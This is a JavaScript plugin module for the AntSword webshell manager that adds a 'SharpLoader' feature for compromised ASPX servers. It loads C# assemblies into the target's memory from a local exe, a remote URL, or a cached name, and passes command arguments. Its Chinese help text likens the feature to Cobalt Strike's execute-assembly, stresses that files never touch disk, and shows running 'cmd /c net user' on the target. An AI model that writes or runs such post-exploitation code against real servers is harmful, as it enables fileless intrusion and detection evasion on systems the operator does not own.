"use strict";

const Base = require("../base");
const LANG = require("../../language"); // 插件语言库
const LANG_T = antSword["language"]["toastr"]; // 通用通知提示
class SharpLoader extends Base {
  precheck() {
    if (this.shelltype == "aspxcsharp" || this.shelltype == "aspx") {
      return true;
    }
    return false;
  }
  createForm(cell) {
    let self = this;
    var str = [
      {
        type: "fieldset",
        name: "action_fieldset",
        label: LANG["core"]["sharp_loader"]["Fieldset"]["action_fieldset"],
        list: [
          {
            type: "radio",
            name: "action",
            label: LANG["core"]["sharp_loader"]["form"]["load_by_memory"],
            value: "load_by_memory",
            checked: "1",
            position: "label-right",
            list: [
              {
                type: "input",
                name: "local_file_path",
                label: LANG["core"]["sharp_loader"]["form"]["local_file_path"],
                labelAlign: "left",
                inputWidth: 400,
                labelWidth: 80,
                position: "label-left",
              },
              {
                type: "button",
                name: "select_file",
                value: LANG["core"]["sharp_loader"]["form"]["select_file"],
              },
            ],
          },
          {
            type: "radio",
            name: "action",
            label: LANG["core"]["sharp_loader"]["form"]["load_by_url"],
            value: "load_by_url",
            position: "label-right",
            list: [
              {
                type: "input",
                name: "remote_file_path",
                label: LANG["core"]["sharp_loader"]["form"]["remote_file_path"],
                labelAlign: "left",
                inputWidth: 400,
                labelWidth: 80,
                position: "label-left",
              },
            ],
          },
          {
            type: "radio",
            name: "action",
            label: LANG["core"]["sharp_loader"]["form"]["list_all"],
            value: "list_all",
            position: "label-right",
          },
          {
            type: "radio",
            name: "action",
            label: LANG["core"]["sharp_loader"]["form"]["load_by_name"],
            value: "load_by_name",
            position: "label-right",
            list: [
              {
                type: "input",
                name: "assembly_name",
                label: LANG["core"]["sharp_loader"]["form"]["assembly_name"],
                labelAlign: "left",
                inputWidth: 400,
                labelWidth: 80,
                position: "label-left",
              },
            ],
          },
        ],
      },
      {
        type: "fieldset",
        name: "cmd_fieldset",
        label: LANG["core"]["sharp_loader"]["Fieldset"]["cmd_fieldset"],
        list: [
          {
            type: "input",
            name: "command_args",
            label: LANG["core"]["sharp_loader"]["form"]["command_args"],
            inputWidth: 400,
            labelWidth: 80,
            offsetLeft: "20",
            offsetTop: "20",
          },
        ],
      },
    ];
    var form = cell.attachForm(str);
    form.attachEvent("onButtonClick", function (name, command) {
      const { dialog } = require("electron").remote;
      dialog.showOpenDialog(
        {
          title: "选择文件",
          //默认路径,默认选择的文件
          // defaultPath: "calc.jar",
          //过滤文件后缀
          filters: [
            {
              name: "exe",
              extensions: ["exe"],
            },
            { name: "All Files", extensions: ["*"] },
          ],
        },
        (result) => {
          console.log(result);
          self.form.setItemValue("local_file_path", result[0]);
        }
      );
    });
    this.form = form;
    this.showTips();
  }
  showTips() {
    let tips = `## 简介
加载C#程序集到内存中。类似Cobalt Strike的execute-assembly功能。
    
## 内存加载
直接通过HTTP包将assembly打入目标内存，仅需选择本地需要加载的exe文件即可，期间文件不落地。

## URL加载
远程加载assembly。

## 获取已加载的Assembly
获取已加载的Assembly，以|分隔

## 通过名称加载
assembly在第一次通过内存或者远程加载后会保存到上下文中，后续可以通过反射调用，无需每次都传递assembly程序集。

## 命令行参数
参数内空格分割符：{}
例如需要执行 cmd /c 'net user'
则填写 cmd /c net{}user
`;
    this.editor.session.setValue(tips);
  }

  getArgs() {
    let args = {};
    let action = this.form.getCheckedValue("action");
    if (action == "load_by_memory") {
      let local_file_path = this.form.getItemValue("local_file_path");
      console.log(local_file_path);
      let bin = this.file2base64(local_file_path);
      args["bin"] = bin;
      args["type"] = "run";
    } else if (action == "load_by_url") {
      args["type"] = "url";
      args["bin"] = this.form.getItemValue("remote_file_path");
    } else if (action == "load_by_name") {
      args["type"] = "name";
      args["bin"] = this.form.getItemValue("assembly_name");
    } else if (action == "list_all") {
      args["type"] = "list";
    }
    this.parammode = 2;
    this.payloadtype = "load_assembly";
    args["cmd"] = this.form.getItemValue("command_args");
    // args["type"] = "run";
    return args;
  }
  file2base64(file) {
    const fs = require("fs");
    const path = require("path");
    let filePath = path.resolve(file);
    let data = fs.readFileSync(filePath);
    data = Buffer.from(data).toString("base64");
    return data;
  }
  uploadBuffFunc(data) {
    let buffIndex = 0;
    let buff = [];
    // 分段上传大小，默认0.5M(jsp 超过1M响应会出错)
    let dataSplit = 500 * 1024;
    let fileBuff = data;
    // 文件数据分段
    let buffLength = fileBuff.length;
    while (buffIndex <= buffLength) {
      let buffSplit = fileBuff.slice(buffIndex, buffIndex + dataSplit);
      buffIndex += dataSplit;
      buff.push(buffSplit);
    }
    return buff;
  }
}
module.exports = SharpLoader;
